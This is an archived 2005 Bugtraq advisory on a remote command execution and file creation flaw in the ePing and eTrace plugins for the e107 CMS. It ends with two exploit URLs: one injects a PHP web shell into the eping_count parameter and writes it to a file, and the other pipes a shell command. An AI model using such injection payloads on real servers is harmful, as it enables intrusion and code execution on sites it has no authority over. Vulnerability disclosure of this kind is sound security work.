lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20050805152144.3294.qmail@securityfocus.com>
Date: 5 Aug 2005 15:21:44 -0000
From: os2a.bto@...il.com
To: bugtraq@...urityfocus.com
Subject: Vulnerability in ePing and eTrace plugins of e107


OS2A

ePing Arbitrary File Creation/Command Execution Vulnerability


OS2A ID: OS2A_1001				Status						Published: 08/04/2005				Updated  : 08/05/2005 
	Patch Released

Class: File Creation/Command Execution	
Severity: CRITICAL


Overview:
ePing is a ping utility plugin for e107, a PHP-based content management system that uses a MySQL backend database. ePing versions 1.02 and prior are vulnerable to a file creation vulnerability caused by improper validation of user-supplied input in the doping.php script. A remote attacker exploiting this vulnerability could then create an arbitrary file in the webserver, pipe multiple system commands in the eping_host or the eping_count parameters of the doping.php script, which would be executed within the security context of the hosting site.

eTrace, another utility plugin for e107 has similar vulnerabilities.

Description:
e107 portal's eping plugin 1.02 and prior is prone to remote command execution vulnerability. This vulnerability exists due to output redirection operators like '>', '|', '&' are not being sanitized in eping_host,eping_count parameters in the doping.php script. 

eping_host has a validate function in functions.php which does not consider the above mentioned case. 

eping_count has no validation logic. It accepts the above mentioned system meaningful characters. 


Impact:
A remote user can execute any command using '|' character or create a file with malicious executable code with '>' character. Execution of arbitrary command or creation of arbitrary files can lead to, Denial of service, Disclosure or 
modification of system information or Execution of arbitrary code.


Affected Systems:
ePing version 1.02 and prior
Linux (Any), Unix (Any), Windows (Any)


Exploit:

a. 
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping%20-n&eping_host=127.0.0.1&eping_count=2%20%22%3C?php%20system(%94cmd.exe%94)?%3E%22%20%3Etest.php

b.
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping%20-n&eping_host=127.0.0.1&eping_count=2|dir


Solutions:
	Patch:
	Upgrade to the version 1.03 of ePing and eTrace plugins.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ